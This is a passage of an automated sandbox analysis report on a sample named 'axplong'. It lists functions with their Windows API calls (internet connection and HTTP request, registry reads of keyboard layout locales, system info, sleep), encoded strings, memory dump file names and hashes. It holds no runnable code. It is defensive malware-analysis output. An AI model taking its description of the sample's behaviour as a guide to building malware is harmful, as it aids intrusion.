V0N6, xrefs: 00CF537A
246122658369, xrefs: 00CF4F3A, 00CF4F4D, 00CF4F8F, 00CF4F99, 00CF54F4
JB6, xrefs: 00CF53F5
KFT0PL==, xrefs: 00CF54B9
MJF+, xrefs: 00CF47BD, 00CF48EC, 00CF4ADC, 00CF4C0B
fed3aa, xrefs: 00CF5489
9KN6, xrefs: 00CF5351
V0x6, xrefs: 00CF541E
6F9fr==, xrefs: 00CF4712
aZT6, xrefs: 00CF53CC
Vp 6, xrefs: 00CF5447
stoi argument out of range, xrefs: 00CF4EAC
MJB+, xrefs: 00CF4776, 00CF47ED, 00CF4A95, 00CF4B0C
8ZF6, xrefs: 00CF5502
Fz==, xrefs: 00CF4D2D
96B6, xrefs: 00CF5470
WJP6, xrefs: 00CF53A3
9526, xrefs: 00CF531D
mP=, xrefs: 00CF6383, 00CF6652
aqB6, xrefs: 00CF54DB

Memory Dump Source

Source File: 00000001.00000002.4187544382.0000000000CE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000001.00000002.4187522404.0000000000CE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187544382.0000000000D42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187615019.0000000000D49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000D4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000EC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FAA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FD6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FEC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188005306.0000000000FED000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188132597.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188156747.0000000001186000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ce0000_axplong.jbxd

Yara matches

Similarity

API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestXinvalid_argumentstd::_
String ID: 5F6$ 6F9fr==$ JB6$ mP=$246122658369$8ZF6$9526$96B6$9KN6$Fz==$KFT0PL==$MJB+$MJF+$V0N6$V0x6$Vp 6$WJP6$aZT6$aqB6$fed3aa$stoi argument out of range
API String ID: 2414744145-1662704651
Opcode ID: 3f403455ac140c8c81c7fd3396f2a66ecd847aa74a94d3842f165f3e2054404e
Instruction ID: da16d261169a03bb528f583c49d141f98280a607844dab656721041b62317116
Opcode Fuzzy Hash: 3f403455ac140c8c81c7fd3396f2a66ecd847aa74a94d3842f165f3e2054404e
Instruction Fuzzy Hash: 7D232771E0015C8BEB19DB28CD897ADBB769F81304F5482D8E109AB2C6DB359F85CF52

Function 00CE5C60 Relevance: 16.2, APIs: 4, Strings: 5, Instructions: 473
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNEL32(?,?,00000000,00000001,?), ref: 00CE5CDC
RegCloseKey.KERNEL32(?,?,?,00000000,00000001,?), ref: 00CE5D16

Strings

00000422, xrefs: 00CE5FD9
00000423, xrefs: 00CE600A
0000043f, xrefs: 00CE603B
Keyboard Layout\Preload, xrefs: 00CE5F64
00000419, xrefs: 00CE5FA8

Memory Dump Source

Source File: 00000001.00000002.4187544382.0000000000CE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000001.00000002.4187522404.0000000000CE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187544382.0000000000D42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187615019.0000000000D49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000D4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000EC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FAA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FD6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FEC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188005306.0000000000FED000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188132597.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188156747.0000000001186000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ce0000_axplong.jbxd

Yara matches

Similarity

API ID: CloseOpen
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 47109696-3963862150
Opcode ID: 3aa75596eb67e833ad288c886a8f479585ae7c0d3a2a4a85f790b8dbad02b2d7
Instruction ID: d38ae624ba29232f9868d35fb7c2a714e64cd5b633c4fe18dc9856931535f366
Opcode Fuzzy Hash: 3aa75596eb67e833ad288c886a8f479585ae7c0d3a2a4a85f790b8dbad02b2d7
Instruction Fuzzy Hash: 4602CF7190025CAFEB24DFA4CC88BEEB7B9EB14304F5042D9E509A7291DB749BC58F91

Function 00CE7D00 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CE7EA3

Strings

JmpxQb==, xrefs: 00CE81B2
JmpxRL==, xrefs: 00CE8062
JmpyPb==, xrefs: 00CE810A

Memory Dump Source

Source File: 00000001.00000002.4187544382.0000000000CE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000001.00000002.4187522404.0000000000CE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187544382.0000000000D42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187615019.0000000000D49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000D4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000EC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FAA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FD6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FEC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188005306.0000000000FED000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188132597.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188156747.0000000001186000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ce0000_axplong.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID: JmpxQb==$JmpxRL==$JmpyPb==
API String ID: 1721193555-2057465332
Opcode ID: db0a3e773da65586598aa887b7b2a4e260c99e72db7d5871670dc68f1e7bf1f2
Instruction ID: 61fa7bdac6b042190c7b6a57628b2b88aff41ad41d676370121cac6c9abe6a4a
Opcode Fuzzy Hash: db0a3e773da65586598aa887b7b2a4e260c99e72db7d5871670dc68f1e7bf1f2
Instruction Fuzzy Hash: C8D10771E00688ABDF14BF69DD4B3AD7771AB42314F904288E415AB3C2DB354F859BE2

Function 00D16E01 Relevance: 4.6, APIs: 3, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNEL32(?,?,00000000,00000000), ref: 00D16E23
GetFileInformationByHandle.KERNEL32(?,?), ref: 00D16E7D
__dosmaperr.LIBCMT ref: 00D16F12

Part of subcall function 00D17177: __dosmaperr.LIBCMT ref: 00D171AC

Memory Dump Source

Source File: 00000001.00000002.4187544382.0000000000CE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000001.00000002.4187522404.0000000000CE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187544382.0000000000D42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187615019.0000000000D49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000D4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000EC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FAA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FD6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FEC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188005306.0000000000FED000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188132597.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188156747.0000000001186000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ce0000_axplong.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$HandleInformationType
String ID:
API String ID: 2531987475-0
Opcode ID: c03ae378662d8f4cbc477ff9e039d24b5da2ede11d90d384b2afd1a8b3429361
Instruction ID: e7df2970841c0a4550778906a12df2aebf3f61bb99c84b1cf3ab2050b719f98f
Opcode Fuzzy Hash: c03ae378662d8f4cbc477ff9e039d24b5da2ede11d90d384b2afd1a8b3429361
Instruction Fuzzy Hash: DC413A75900204BADB24DFB5E8459EBBBF9EF89300B144529F956D3620EA31E985CB31

Function 00D16C99 Relevance: 3.1, APIs: 2, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000001.00000002.4187544382.0000000000CE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000001.00000002.4187522404.0000000000CE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187544382.0000000000D42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187615019.0000000000D49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000D4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000EC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FAA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FD6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FEC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188005306.0000000000FED000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188132597.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188156747.0000000001186000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ce0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e29f078d4a79456359d1269bef8927805527bb47dfcf1a407baabce87fdbd82
Instruction ID: 60c4ec474feec7c0cf25b8b069b23c16b79ad3b735857c1f802d3ec655fa319e
Opcode Fuzzy Hash: 3e29f078d4a79456359d1269bef8927805527bb47dfcf1a407baabce87fdbd82
Instruction Fuzzy Hash: 8321B372A052087AEB11ABA4BC42BDF3729DF41778F254311F9242B1D1DF70DE8596B1

Function 00CE82B0 Relevance: 1.7, APIs: 1, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNEL32(?), ref: 00CE8454

Memory Dump Source

Source File: 00000001.00000002.4187544382.0000000000CE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000001.00000002.4187522404.0000000000CE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187544382.0000000000D42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187615019.0000000000D49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000D4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000EC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FAA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FD6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FEC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188005306.0000000000FED000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188132597.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188156747.0000000001186000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ce0000_axplong.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: bf6bd2fce2364ea42b22c3b1d50acf9b5fa4d99c2f72d137055ba6e8cd4e8cd4
Instruction ID: 09fcecd8f86ab2da2a3ceba0342919993d2a5dea2fa8e8023df3658940f9513f
Opcode Fuzzy Hash: bf6bd2fce2364ea42b22c3b1d50acf9b5fa4d99c2f72d137055ba6e8cd4e8cd4
Instruction Fuzzy Hash: 8B515971D002489BDB14EF29CD49BEDB775DB45300F5042A8E818A72D1EF359E848BA2

Function 00D16F71 Relevance: 1.6, APIs: 1, Instructions: 56
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00D16FB3

Memory Dump Source

Source File: 00000001.00000002.4187544382.0000000000CE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000001.00000002.4187522404.0000000000CE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187544382.0000000000D42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187615019.0000000000D49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000D4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000EC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FAA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FD6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FEC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188005306.0000000000FED000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188132597.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188156747.0000000001186000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ce0000_axplong.jbxd

Yara matches

Similarity

API ID: Time$LocalSpecificSystem
String ID:
API String ID: 2574697306-0
Opcode ID: 7f2724807f23b853c63b699c24b7f666197360a0470f52ba377de3350c197fef
Instruction ID: 046fff10f96f2c6f147b977b584d1cdade8dc447aa380197c667ef9813e0e52c
Opcode Fuzzy Hash: 7f2724807f23b853c63b699c24b7f666197360a0470f52ba377de3350c197fef
Instruction Fuzzy Hash: DC11C8B290020CAACB10DE95E985EEEB7BCAF08310F555266E515E6180EA71EB458B71

Function 00CF6AE0 Relevance: 1.3, APIs: 1, Instructions: 40
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 00CF6B65

Memory Dump Source

Source File: 00000001.00000002.4187544382.0000000000CE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000001.00000002.4187522404.0000000000CE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187544382.0000000000D42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187615019.0000000000D49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000D4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000EC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FAA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FD6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FEC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188005306.0000000000FED000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188132597.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188156747.0000000001186000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ce0000_axplong.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 7b507dbc34264c763bd741e4de73c73fd30c8c3aa5cdea79323a50b19116e9c2
Instruction ID: 37b56195c558767b81a3b24fa042946a200f75e2f149e5500c59795e9a785590
Opcode Fuzzy Hash: 7b507dbc34264c763bd741e4de73c73fd30c8c3aa5cdea79323a50b19116e9c2
Instruction Fuzzy Hash: E4F0D135E00608ABC700BB699C07B2E7B64EB07B60F800348F811A73E1DA345A049BE3

Function 05440B24 Relevance: .1, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000001.00000002.4189982065.0000000005440000.00000040.00001000.00020000.00000000.sdmp, Offset: 05440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5440000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb4a3f9e9ef0a5e5ceee0765d7e9842b87a90d467454e473a41709eab1073cf2
Instruction ID: aebdbf85ece354907d7fd2b05dd525802594f32c4806cb35f13a78f3bbc8598e
Opcode Fuzzy Hash: cb4a3f9e9ef0a5e5ceee0765d7e9842b87a90d467454e473a41709eab1073cf2
Instruction Fuzzy Hash: 0511C8B71CD250FEB141C5D12B1CAF6776EE6D27347308867F60BCE102E2948A2B6974

Function 05440B55 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4189982065.0000000005440000.00000040.00001000.00020000.00000000.sdmp, Offset: 05440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5440000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4226348a3e8f1e8447ea848c8dbaa591c6a5b6f33ac20a86e28a1526015584a5
Instruction ID: cb9a5ba53d550dc885b573628161888c9db051cede74e602dcbca3b52b11f2cf
Opcode Fuzzy Hash: 4226348a3e8f1e8447ea848c8dbaa591c6a5b6f33ac20a86e28a1526015584a5
Instruction Fuzzy Hash: 26F0F9F248D2D09EF342CAB4161C5F13FAAD59633431448A7F14ACF503D144492B8A34

Function 05440B3E Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4189982065.0000000005440000.00000040.00001000.00020000.00000000.sdmp, Offset: 05440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5440000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81b24a108e02ca7f6d3b6ddb0890a6ca4bb2c67fb939f059267055bfdcb1d051
Instruction ID: 5273f9db2e8b79b54c7e47e41959003bc12aabab1a3e93e2a649ea25630cadd8
Opcode Fuzzy Hash: 81b24a108e02ca7f6d3b6ddb0890a6ca4bb2c67fb939f059267055bfdcb1d051
Instruction Fuzzy Hash: C4F024B71DC250EE7101C1D12B6CEF223AFE2D03383308867F20BCE502E2448A2B5838

Function 05440B1E Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4189982065.0000000005440000.00000040.00001000.00020000.00000000.sdmp, Offset: 05440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5440000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d50e6b5c336aad762c8a3ed838d24229072b6899b8c1aec1be83c3299ce04562
Instruction ID: 99c1b7f461d7b06e66492d2679aecf453d108160774fab4a4da505db7561c082
Opcode Fuzzy Hash: d50e6b5c336aad762c8a3ed838d24229072b6899b8c1aec1be83c3299ce04562
Instruction Fuzzy Hash: 5DF03AB61DC290EE7141C6C12B5CEF663AFA6D47387308867F60FCE502D2548A2B6939

Function 05440B9D Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4189982065.0000000005440000.00000040.00001000.00020000.00000000.sdmp, Offset: 05440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5440000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a3a3e2468b4ac88f54b71c43620d82b257ab9e08ca9e08fde474ffccfb1b44b
Instruction ID: aad144312e0baa09a2deb04cd414926500c7b2a4d782b7fd13116207e10d7a94
Opcode Fuzzy Hash: 5a3a3e2468b4ac88f54b71c43620d82b257ab9e08ca9e08fde474ffccfb1b44b
Instruction Fuzzy Hash: 18E0E5B25CC261EFB250DAE12B1C6FB73BAF6D1330730882BF10BCA001D265462B5935

Function 05440B7C Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4189982065.0000000005440000.00000040.00001000.00020000.00000000.sdmp, Offset: 05440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5440000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d366b9e1be30302e807d9214c4a25c5603549adfa7b2e94ce36c4a1c1540472f
Instruction ID: 12e55ca23d6974a964e8499413306dd97edd76e5c42751daee6596c0781d512e
Opcode Fuzzy Hash: d366b9e1be30302e807d9214c4a25c5603549adfa7b2e94ce36c4a1c1540472f
Instruction Fuzzy Hash: 07E0DFB229C150EDB044C6813B1CAF663AAE2C0738370881BF20BCC002E6594A2B5835

Function 05440B8C Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4189982065.0000000005440000.00000040.00001000.00020000.00000000.sdmp, Offset: 05440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5440000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d947e3cde00afe5b744759a4abc6de305dc80eb2068656987c038416c6c527b1
Instruction ID: 183c68b83fe681599076393cac1a6305babd3eaddc116768d49d848ccf5e86c3
Opcode Fuzzy Hash: d947e3cde00afe5b744759a4abc6de305dc80eb2068656987c038416c6c527b1
Instruction Fuzzy Hash: 77E0C2B71CC161EE7204C6D13B2CAFA93AEE5C0334370882BF60BCD001D258462B6835

Function 05440BBB Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4189982065.0000000005440000.00000040.00001000.00020000.00000000.sdmp, Offset: 05440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5440000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68fd35cc89dd4c79225153ebc831620a3907820bf7736869c322099a1bfce379
Instruction ID: bcf26f5797d1ac672a50b1f3ee85c2635a0222b501645ae3e993576d997b8139
Opcode Fuzzy Hash: 68fd35cc89dd4c79225153ebc831620a3907820bf7736869c322099a1bfce379
Instruction Fuzzy Hash: FCD0C9BB59C060ED7044C2D23B2CBFB53BEE1D0721370846BFA0BC8401D7598A2BA936

Non-executed Functions

Function 00CEE440 Relevance: 36.2, APIs: 2, Strings: 17, Instructions: 2960COMMON

Download Yara Rule

APIs

Part of subcall function 00CF7870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00CF795C
Part of subcall function 00CF7870: __Cnd_destroy_in_situ.LIBCPMT ref: 00CF7968
Part of subcall function 00CF7870: __Mtx_destroy_in_situ.LIBCPMT ref: 00CF7971

std::_Xinvalid_argument.LIBCPMT ref: 00CF07C5

Strings

246122658369, xrefs: 00CEF647, 00CEF924, 00CEFD10, 00CF04F7, 00CF08AA, 00CF15A9
FFNmLv==, xrefs: 00CEFDF4
fed3aa, xrefs: 00CEFA9E
invalid stoi argument, xrefs: 00CF07C0, 00CF14F8
WGt=, xrefs: 00CEF62D, 00CEF90A, 00CEFCF3
FlpmMdzrTXUg, xrefs: 00CEFE29
#, xrefs: 00CF0534
puu2B7m, xrefs: 00CEED94
stoi argument out of range, xrefs: 00CF07D4, 00CF1502
GqKudSO2, xrefs: 00CEE47F
WWp=, xrefs: 00CF04DA
MJB+, xrefs: 00CEE734
GlNgUSfi8Dy=, xrefs: 00CEFDC6
UD==, xrefs: 00CEEA1F, 00CEEB51, 00CEEC66, 00CEEE99, 00CEF1DE
MT==, xrefs: 00CEE4A5
111, xrefs: 00CEF6B0
WWt=, xrefs: 00CF088D, 00CF158C

Memory Dump Source

Source File: 00000001.00000002.4187544382.0000000000CE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000001.00000002.4187522404.0000000000CE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187544382.0000000000D42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187615019.0000000000D49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000D4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000EC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FAA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FD6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4187640247.0000000000FEC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188005306.0000000000FED000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188132597.0000000001184000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.4188156747.0000000001186000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ce0000_axplong.jbxd

Yara matches

Similarity

API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situXinvalid_argumentstd::_
String ID: puu2B7m$#$111$246122658369$FFNmLv==$FlpmMdzrTXUg$GlNgUSfi8Dy=$GqKudSO2$MJB+$MT==$UD==$WGt=$WWp=$WWt=$fed3aa$invalid stoi argument$stoi argument out of range
API String ID: 4234742559-2205604348
Opcode ID: 15719c0ed48632518be622bee5f535fc2ab528fa3452574a15e1620e91f0cb3c
Instruction ID: 3bf65b0d4530261ec4223ecf5e50cff0c6b71eba300fbddbfdb068774aca2e16
Opcode Fuzzy Hash: 15719c0ed48632518be622bee5f535fc2ab528fa3452574a15e1620e91f0cb3c
Instruction Fuzzy Hash: D133FB71A1018C9BEF18DF38CD897AD7B72AF85304F60829CE4059B3D6DB359A85CB52

Function 00D23068 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00D231E3

Strings

1#SNAN, xrefs: 00D2437A
1#INF, xrefs: 00D2439E
1#IND, xrefs: 00D24373
1#QNAN, xrefs: 00D24381

Memory Dump Source

